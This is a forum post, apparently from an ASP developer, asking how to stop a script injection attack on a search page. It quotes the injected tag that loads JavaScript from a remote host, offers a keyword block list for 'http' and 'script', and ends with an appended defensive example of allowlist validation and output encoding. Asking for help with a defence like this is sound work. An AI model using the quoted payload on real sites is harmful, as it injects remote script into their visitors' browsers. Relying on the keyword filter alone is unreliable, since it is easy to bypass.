shank
I've been hit again using DW, parameterized queries and stored procedures.
I'm guessing I was not strict enough with character counts and allowing too
long of a string to pass.
Aside from that, as crude as it may be, is the below enough to stop these
attacks? If not, how would they get around this?
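<%
' Redirect when the raw query string contains "http" or "script".
' InStr takes the string to search and the substring to find; it returns 0 when there is no match.
If InStr(Request.QueryString, "http") > 0 Or _
   InStr(Request.QueryString, "script") > 0 Then
    Response.Redirect ("e.asp?msg=go away")
End If
%>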
A variation of the following script string is being inserted through a
search page:
<script src=http://www.xxxxx.mobi/ngg.js></script>
thanks
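
Added example, not part of the original post: one way to apply the strict length limit the post mentions as an allowlist on the search parameter, and to HTML-encode every value when it is written to the page so that a stored `<script>` string renders as inert text. The parameter name `q`, the 50-character limit, and the helpers `IsSafeSearchTerm` and `H` are assumptions made for illustration.

```vbscript
<%
Option Explicit

' Assumed limit for a search box; set it to the longest term the page really needs.
Const MAX_TERM_LEN = 50

' Allowlist check: accept only letters, digits, spaces, apostrophes and hyphens,
' and only up to MAX_TERM_LEN characters. Everything else is rejected, so there
' is no list of "bad" words to keep up to date.
Function IsSafeSearchTerm(term)
    Dim re
    IsSafeSearchTerm = False
    If Len(term) = 0 Or Len(term) > MAX_TERM_LEN Then Exit Function
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9 '\-]+$"
    IsSafeSearchTerm = re.Test(term)
End Function

' Output helper: encode on the way out, whatever the source of the value
' (query string or database). Appending "" turns Null/Empty into a string.
Function H(value)
    H = Server.HTMLEncode(value & "")
End Function

Dim term, storedValue
term = Trim(Request.QueryString("q"))   ' "q" is a hypothetical parameter name

If Not IsSafeSearchTerm(term) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid search term."
    Response.End
End If

' ... run the existing parameterized query / stored procedure with term here ...

Response.Write "<p>Results for: " & H(term) & "</p>"

' Constructed sample standing in for a row that already contains the injected
' string quoted in the post. Encoded output shows it as text instead of running it.
storedValue = "<script src=http://www.xxxxx.mobi/ngg.js></script>"
Response.Write "<p>" & H(storedValue) & "</p>"
%>
```

Encoding at output also covers rows that were modified before the input check was in place, which an input filter alone cannot do.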